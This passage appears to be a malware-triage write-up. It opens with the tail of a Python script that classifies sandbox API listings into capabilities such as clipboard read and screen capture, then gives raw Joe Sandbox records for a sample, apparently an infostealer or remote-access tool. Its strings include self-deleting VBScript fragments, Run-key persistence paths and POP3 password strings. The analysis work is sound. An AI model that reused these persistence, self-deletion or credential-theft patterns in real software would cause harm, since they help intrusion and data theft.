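# One "APIs" bullet, with or without an argument list or a "Part of subcall" prefix, e.g.
#   • GetClipboardData.USER32(0000000D), ref: 0040B71D
#   • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
#   • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# The "Source File: ..., Offset: 00400000, ..." line names the image base of the dump.
BASE_RE = re.compile(r"Source File:.*?Offset:\s*(?P<base>[0-9A-Fa-f]+)")

# Clipboard format constants from winuser.h; the report's 0000000D is CF_UNICODETEXT.
CLIPBOARD_FORMATS = {1: "CF_TEXT", 7: "CF_OEMTEXT", 13: "CF_UNICODETEXT"}

# Capability table (this example's own): name -> (required APIs, any-one-of APIs, confidence).
# The two CRT entries are MSVC runtime fault/abort boilerplate found in benign binaries
# too, hence "low": they must not drive a verdict on their own.
CAPABILITIES = {
    "crt-unhandled-exception-path":
        ({"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"}, set(), "low"),
    "crt-terminate-path": ({"GetCurrentProcess", "TerminateProcess", "ExitProcess"}, set(), "low"),
    "clipboard-read": ({"OpenClipboard", "GetClipboardData", "CloseClipboard"}, set(), "high"),
    "screen-capture":
        ({"CreateCompatibleDC", "CreateCompatibleBitmap", "GetDIBits"}, {"BitBlt", "StretchBlt"}, "high"),
}


def parse_report(text):
    """Split report text into functions: {"base": str, "calls": [(api, module, args, ref)]}."""
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # every per-function listing starts with this header
            current = {"base": "", "calls": []}
            functions.append(current)
            continue
        if current is None:
            continue
        m = API_RE.search(line)
        if m:
            args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
            current["calls"].append((m["api"], m["mod"], args, m["ref"].upper()))
            continue
        m = BASE_RE.search(line)
        if m:
            current["base"] = m["base"].upper()
    return [f for f in functions if f["calls"]]


def clipboard_format(fn):
    """Decode GetClipboardData's uFormat argument when the sandbox resolved it (not "?")."""
    for api, _mod, args, _ref in fn["calls"]:
        if api == "GetClipboardData" and args and args[0] != "?":
            code = int(args[0], 16)
            return CLIPBOARD_FORMATS.get(code, "format 0x%X" % code)
    return None


def classify(fn):
    """Return (capability, confidence, detail) for every table entry the call set satisfies."""
    names = {c[0] for c in fn["calls"]}
    tags = []
    for cap, (required, any_of, confidence) in CAPABILITIES.items():
        if required <= names and (not any_of or any_of & names):
            detail = (clipboard_format(fn) or "") if cap == "clipboard-read" else ""
            tags.append((cap, confidence, detail))
    return tags


def triage(text):
    """(image base, first call site, tags) per function; untagged functions keep an empty list."""
    return [(fn["base"], fn["calls"][0][3], classify(fn)) for fn in parse_report(text)]


# Constructed sample: four listings copied from this report's 0x400000 dump.
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC1A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
• TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
• ExitProcess.KERNEL32 ref: 004432EF
APIs
• OpenClipboard.USER32(00000000), ref: 0040B711
• GetClipboardData.USER32(0000000D), ref: 0040B71D
• CloseClipboard.USER32 ref: 0040B725
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
"""

if __name__ == "__main__":
    for base, ref, tags in triage(SAMPLE):
        print(base or "?", ref, tags or "no capability tag")
```

Run against the full report text (copied from the page) the script lists one line per function; only the "high" tags are worth carrying into an incident write-up, and the clipboard tag also records which format the sample asked for, which is the difference between grabbing typed text and, say, files.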
APIs
• CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
• CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
  • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
• CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
• DeleteDC.GDI32(00000000), ref: 00418F2A
• DeleteDC.GDI32(00000000), ref: 00418F2D
• DeleteObject.GDI32(00000000), ref: 00418F30
• SelectObject.GDI32(00000000,00000000), ref: 00418F51
• DeleteDC.GDI32(00000000), ref: 00418F62
• DeleteDC.GDI32(00000000), ref: 00418F65
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
• GetCursorInfo.USER32(?), ref: 00418FA7
• GetIconInfo.USER32(?,?), ref: 00418FBD
• DeleteObject.GDI32(?), ref: 00418FEC
• DeleteObject.GDI32(?), ref: 00418FF9
• DrawIcon.USER32(00000000,?,?,?), ref: 00419006
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
• GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
• LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
• GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
• GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
• DeleteDC.GDI32(?), ref: 0041917C
• DeleteDC.GDI32(00000000), ref: 0041917F
• DeleteObject.GDI32(00000000), ref: 00419182
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0041918D
                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00419241
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00419248
                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00419258
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00419263
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                                    • API String ID: 4256916514-865373369
                                                                                                                                                                    • Opcode ID: 7aae0363b82f15def8c1581c033c038ec08a9654ede249bf66ec2ce172949d4b
                                                                                                                                                                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
• Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041C510,00000000,00000000,?), ref: 0041C430
• ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
• ExitProcess.KERNEL32 ref: 0040D7D0
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-332907002
• Opcode ID: 7cc0c98288c0119a44133e8490d399651bb14fb5177cdd2c1d89a987e8487361
• Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
• Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
• ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
• ExitProcess.KERNEL32 ref: 0040D419
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
• API String ID: 3797177996-2557013105
• Opcode ID: 2debcc6bf3125d5e17e50028151b22dbbd83ba3fd43fe76836cda192c3f5f902
• Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
• Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
• ExitProcess.KERNEL32(00000000), ref: 004124A0
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
• CloseHandle.KERNEL32(00000000), ref: 0041253B
• GetCurrentProcessId.KERNEL32 ref: 00412541
• PathFileExistsW.SHLWAPI(?), ref: 00412572
• GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
• GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
• lstrcatW.KERNEL32(?,.exe), ref: 00412601
  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041C510,00000000,00000000,?), ref: 0041C430
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
• Sleep.KERNEL32(000001F4), ref: 00412682
• OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
• CloseHandle.KERNEL32(00000000), ref: 004126A9
• GetCurrentProcessId.KERNEL32 ref: 004126AF
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
• String ID: .exe$8SG$WDH$exepath$open$temp_
• API String ID: 2649220323-436679193
• Opcode ID: 0681ceed030fd07f2c6c35b636bd357a716a10239b41aabe8fecb3bb8a72a298
• Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
• Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
Uniqueness
Uniqueness Score: -1.00%

APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
• SetEvent.KERNEL32 ref: 0041B219
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
• CloseHandle.KERNEL32 ref: 0041B23A
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                                                    • API String ID: 738084811-2094122233
                                                                                                                                                                    • Opcode ID: 88e6de5a846f13b7e49bc902712e9981a9fe0264f8ea6fb0e4510d26c2f049a7
                                                                                                                                                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                                                                                                                                    • Opcode Fuzzy Hash: 88e6de5a846f13b7e49bc902712e9981a9fe0264f8ea6fb0e4510d26c2f049a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
• WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
• WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
• WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
• Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
• Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
• Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
• Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\Public\Libraries\lhgtogaW.pif,00000001,0040764D,C:\Users\Public\Libraries\lhgtogaW.pif,00000003,00407675,004752D8,004076CE), ref: 00407284
• GetProcAddress.KERNEL32(00000000), ref: 0040728D
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
• GetProcAddress.KERNEL32(00000000), ref: 004072A5
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
• GetProcAddress.KERNEL32(00000000), ref: 004072B9
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
• GetProcAddress.KERNEL32(00000000), ref: 004072CD
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
• GetProcAddress.KERNEL32(00000000), ref: 004072E1
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
• GetProcAddress.KERNEL32(00000000), ref: 004072F5
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Users\Public\Libraries\lhgtogaW.pif$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-3736926029
• Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
• Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
• Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
• Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 274C1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D1B
  • Part of subcall function 274C1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 274C1D37
  • Part of subcall function 274C1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D4B
• _strlen.LIBCMT ref: 274C1855
• _strlen.LIBCMT ref: 274C1869
• _strlen.LIBCMT ref: 274C188B
• _strlen.LIBCMT ref: 274C18AE
• _strlen.LIBCMT ref: 274C18C8
Strings
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: 98383f53a3acb96271c21958b3e3a18b9e2cb06bbf1f2748e574821089abd1d6
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: 9C6126B9D00618AFEF12CBA4CC40BDEB7BAAF66600F50409ED604AB354DB745A46CF57
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcslen.LIBCMT ref: 0040CE07
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
• CopyFileW.KERNEL32(C:\Users\Public\Libraries\lhgtogaW.pif,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
• _wcslen.LIBCMT ref: 0040CEE6
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
• CopyFileW.KERNEL32(C:\Users\Public\Libraries\lhgtogaW.pif,00000000,00000000), ref: 0040CF84
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
• _wcslen.LIBCMT ref: 0040CFC6
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
• ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
• ExitProcess.KERNEL32 ref: 0040D062
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Users\Public\Libraries\lhgtogaW.pif$del$open
• API String ID: 1579085052-888387931
• Opcode ID: a282633b3eac4cb8793c6ba94642ff3c36b85cc43f0b99bb842e1a173778b4e4
• Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
• Opcode Fuzzy Hash: a282633b3eac4cb8793c6ba94642ff3c36b85cc43f0b99bb842e1a173778b4e4
• Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?), ref: 0041C036
• _memcmp.LIBVCRUNTIME ref: 0041C04E
• lstrlenW.KERNEL32(?), ref: 0041C067
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
• lstrcmpW.KERNEL32(?,?), ref: 0041C114
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
• _wcslen.LIBCMT ref: 0041C13B
• FindVolumeClose.KERNEL32(?), ref: 0041C15B
• GetLastError.KERNEL32 ref: 0041C173
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
• lstrcatW.KERNEL32(?,?), ref: 0041C1B9
• lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
• GetLastError.KERNEL32 ref: 0041C1D0
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
• Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
• Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
• Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 86087b31e73829a109176817856f8085a32818b8a4ee3a13ec72a7512e0da130
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: C0716AB9C006289BCF12DBB48C84AEF7BFC9F55A00F50009EEA44D7241EA74D785CBA5
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
